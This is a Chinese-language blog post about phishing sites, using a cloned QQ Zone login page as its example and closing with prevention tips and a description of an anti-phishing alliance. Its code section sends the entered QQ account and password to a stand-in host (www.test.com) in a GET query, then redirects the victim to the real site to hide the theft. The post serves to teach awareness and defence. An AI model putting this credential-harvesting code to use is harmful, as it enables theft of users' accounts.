钓鱼网站
Published in:2023-06-29 | category: 前端 网络安全

钓鱼网站

钓鱼网站是指欺骗用户的虚假网站。钓鱼网站的基本特征是,其界面基本与真实网站一致,充满诱导性,通过表单交互来欺骗消费者或者窃取访问者提交的账号和密码信息。钓鱼网站是互联网中最常碰到的一种诈骗方式,通常伪装成银行及电子商务、窃取用户提交的银行账号、密码等私密信息的网站。

攻击实例

在 QQ 非常流行的时期,最常见的钓鱼网站恐怕非”QQ 空间”莫属。高仿一个网站并不是什么难事,尤其是对于拥有 H5 开发经验的人来说。下面这个例子就是笔者花了不到一个小时便仿造出来的 QQ 空间登录页:
仿造.png

真正的 QQ 空间登录页:
真正.png

可以看到,两者之间几乎没有任何差别。在笔者的仿造网站中,用户输入 QQ 账号与 QQ 密码之后点击登录,触发表单提交,提交到远程服务器去,这样就成功的骗到了一个 QQ 账号。

1
2
3
4
5
6
7
8
9
10
11
12
<form
  id="loginform"
  autocomplete="off"
  name="loginform"
  action="www.test.com"
  method="post"
  target="0"
>
  <input type="text" placeholder="支持QQ号/邮箱/手机号登录" />
  <input type="password" placeholder="支持QQ号/邮箱/手机号登录" />
  <input type="submit" value="登录" />
</form>

为了防止露馅,表单需禁止自动提交,防止发生跳转而露出马脚,所以提交操作利用 submit 按钮的 click 事件回调完成,并且提交完成后重定向页面至真实的QQ空间地址,虽然登录不成功,但用户很可能不会去注意这个问题,然后继续在真实的登录页面下登录。如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
window.onload = function () {
  // 禁止表单自动提交
  var form = document.getElementById("loginform");
  form.addEventListener("submit", function (e) {
    e.preventDefault();
    return false;
  });

  var submitBtn = document.getElementById("submitBtn");
  submitBtn.addEventListener("click", function () {
    var account = document.getElementById("inputAccount").value;
    var password = document.getElementById("inputPassword").value;
    console.log("账号:" + account, "密码:" + password);
    $.get("http://www.test.com/?name=" + account + "&password=" + password);
    window.location = "https://qzone.qq.com/";
  });
};

结果:
结果.png

假如http://www.test.com/真实存在,那么该次盗取攻击已经成功执行了。

攻击发生及成功的原因

攻击者多数是抱着从中获利的心态,利用人类的贪婪、恐惧、信任、善良等情感诱骗被攻击者。例如,人们在收到巨额中将信息时,内心的贪欲可能战胜了理智,从而跟随攻击者的指引,一步一步陷入深渊,最终在攻击者仿造的某银行登录页面上泄露银行账户以及密码,造成损失。
短信.jpeg

防范办法

  • 查验“可信网站”   正规经营的网站一般情况下在中国互联网信息中心(CNNIC)存有备案信息,备案信息对应着一个编号,通常情况下该编号存在于网站首页的底部,对应着一个连接,点击会跳转至该网站的经营许可证,格式如“粤网文[2017]6138-1456 号
  • 核对网站域名   无论网站首页如何相似,域名是不可能相同的。通过这点我们就可以辨别当前访问的网站是否是正规网站。
  • 查询网站备案   通过 ICP 备案可以查询网站的基本情况、网站拥有者的情况,对于没有合法备案的非经营性网站或没有取得 ICP 许可证的经营性网站,根据网站性质,将予以罚款,严重的关闭网站 。
  • 查看安全证书   大型的电子商务网站都应用了可信证书类产品,这类的网站网址都是“https”开头的,如果发现不是“https”开头,应谨慎对待。

反钓鱼联盟

中国反钓鱼网站联盟成员单位包括:工商银行、农业银行、中国银行、建设银行、华夏银行、光大银行、银河证券、腾讯、淘宝、支付宝等几十家金融机构和电子商务网站,以及中国万网、中企动力、厦门中资源、厦门华商盛世、阿里巴巴、ChinaSpringboardInc.等国内主要的域名注册服务机构。“中国反钓鱼网站联盟”并非官方机构,它的成员包括了域名管理机构、注册服务机构,以及银行证券类、电子商务类、网络安全类等企业,目的就是为了发现和治理“钓鱼网站”,主要是针对假冒其成员单位的“钓鱼网站”。该联盟在接到涉及联盟成员的投诉后,权威技术鉴定机构会立即对其进行判定,一经认定,两个小时内暂停其域名解析,终止欺诈行为。从处理的及时性上大大降低了“钓鱼网站”所造成的危害  。

最后

最跟本的预防办法还是擦亮眼睛,不要轻信来历不明的信息,谨防电信诈骗。

前端 网络安全
Prev:
文件上传漏洞
Next:
Sentry前端异常监控

    • Copyright © 2019 - 2024 zhangzhiyong | Powered by Hexo